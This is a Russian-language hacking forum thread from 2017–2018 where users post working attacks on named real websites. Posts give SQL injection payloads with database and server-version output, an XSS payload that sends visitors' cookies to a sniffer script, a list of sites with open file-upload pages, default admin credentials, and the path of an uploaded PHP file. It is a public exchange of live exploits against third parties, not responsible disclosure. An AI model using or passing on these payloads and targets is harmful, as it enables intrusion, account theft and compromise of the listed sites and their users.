HOME    FORUMS    MEMBERS    RECENT POSTS    LOG IN  
Баннер 1   Баннер 2

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
Вернуться   Форум АНТИЧАТ > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Песочница
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #131  
Старый 07.10.2017, 18:57
BigBear
Новичок
Регистрация: 04.12.2008
Сообщений: 11
Провел на форуме:
69033

Репутация: 8
По умолчанию

Цитата:
Сообщение от Octavian  
Octavian said:

Зачем
MD5( 123456 ) = e10adc3949ba59abbe56e057f20f883e

Я думал, этот хэш все знают наизусть. Смысл его замазывать?)
 
Ответить с цитированием

  #132  
Старый 07.10.2017, 19:23
Octavian
Guest
Сообщений: n/a
Провел на форуме:
97114

Репутация: 24
По умолчанию

Цитата:
Сообщение от BigBear  
BigBear said:

MD5( 123456 ) = e10adc3949ba59abbe56e057f20f883e

Я думал, этот хэш все знают наизусть. Смысл его замазывать?)

бабадука спроси

PS:Сиски тоже видели все но на ютубе их замазывают
 
Ответить с цитированием

  #133  
Старый 08.10.2017, 09:56
f0b0s
Guest
Сообщений: n/a
Провел на форуме:
2123

Репутация: 1
По умолчанию

Сайт:http://www.vacbanned.com

Уязвимость: SQL Injection

Эксплойт:

Код:
Code:
http://www.vacbanned.com:80/view/detail/id/76561197960265741) AND 3612=3612 AND (8789=8789
MySQL > 5.0.11

available databases [3]:
[*] information_schema
[*] vacbanned_dev
[*] vacbanned_v2
 
Ответить с цитированием

  #134  
Старый 01.11.2017, 01:04
Octavian
Guest
Сообщений: n/a
Провел на форуме:
97114

Репутация: 24
По умолчанию

Засунул в инпутах фейка https://wf-code.ru

[CODE]
Code:
">img = new Image(); img.src = "/snif.php?c="+document.cookie+window.location.href;
 
Ответить с цитированием

  #135  
Старый 06.12.2017, 14:21
BabaDook
Guest
Сообщений: n/a
Провел на форуме:
238786

Репутация: 40
По умолчанию

SSRF Подъехала

Код:
Code:
https://us.hidester.co
.SpoilerTarget" type="button">Spoiler

Кто сможет перейти на другой протокол пишите метод
 
Ответить с цитированием

  #136  
Старый 01.02.2018, 23:48
Octavian
Guest
Сообщений: n/a
Провел на форуме:
97114

Репутация: 24
По умолчанию

Arbitrary file upload 1.php.asd

Код:
Code:
http://ecaterix.md/ecaterix.md/kcfinder/browse.php
http://www.basukiwater.com/assets/js/mylibs/kcfinder/browse.php
http://www.oonohousing.com/member/user/kcfinder/browse.php
http://www.golfoldcourse.com/kcfinder/browse.php
http://www.careersinmorocco.com/www3/assets/js/ckeditor/kcfinder/browse.php
http://dinamikadwiputraperkasajaya.com/admin/assets/kcfinder/browse.php
http://grossiste-tissus.fr/ckeditor/kcfinder/browse.php
http://ex-theatreasia.com/kcfinder/browse.php
http://tohmei-group.sakura.ne.jp/user_data/packages/admin/js/kcfinder/browse.php
http://www.urfaposet.com/panel/kcfinder/browse.php
http://www.raksthai.org/asset/kcfinder/
http://www.godimex.pl/sklep/design/_js_libs/ckeditor/kcfinder/browse.php
http://hadu.org/kcfinder/browse.php
Гуглом можно насобирать сайтов
 
Ответить с цитированием

  #137  
Старый 02.02.2018, 00:04
Octavian
Guest
Сообщений: n/a
Провел на форуме:
97114

Репутация: 24
По умолчанию

Цитата:
Сообщение от BabaDook  
BabaDook said:

Если честно, то к сожалению я ничего не понял, распиши пожалуйста где там уязвимость .
Можем загружать PHP фаилы

L:fm_admin

P:fm_admin

Код:
Code:
http://ecaterix.md/ecaterix.md/kcfinder/upload/files/filemanager.php.asd
 
Ответить с цитированием

  #138  
Старый 03.04.2018, 20:50
erwerr2321
Guest
Сообщений: n/a
Провел на форуме:
759330

Репутация: 147
По умолчанию

там оно всё дырявое куда не ткни...

писать бесполезно - пишут, что всё починили и всё работает.

.SpoilerTarget" type="button">Spoiler: Onesecurity - unsecure

Код:
Code:
curl -s -k --proxy socks5://127.0.0.1:9150 http://onesecurity.zyxel.com/php/wizard.php --data "instruction=get_wizards&parameters%5Btype%5D=z%27 union select 1,@@version--+&parameters%5Bdirection%5D=DESC&parameters%5Bget_active%5D=true"
"Microsoft SQL Server 2005 - 9.00.5057.00 (Intel X86) Mar 25 2011 13:50:04 Copyright (c) 1988-2005 Microsoft Corporation Standard Edition on Windows NT 6.0 (Build 6002: Service Pack 2)"
 
Ответить с цитированием

  #140  
Старый 10.04.2018, 16:10
karkajoi
Guest
Сообщений: n/a
Провел на форуме:
96779

Репутация: 5
По умолчанию

Цитата:
Сообщение от BabaDook  
BabaDook said:

XSS
http://www.task.ua/funds/?id=1&language=
alert(123);
+ sql inject

Код:
Code:
http://www.task.ua/funds/?id=1&language='and updatexml(NULL,concat(0x0a,(SELECT database())),Null)-- -
 
Ответить с цитированием
Ответ





Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ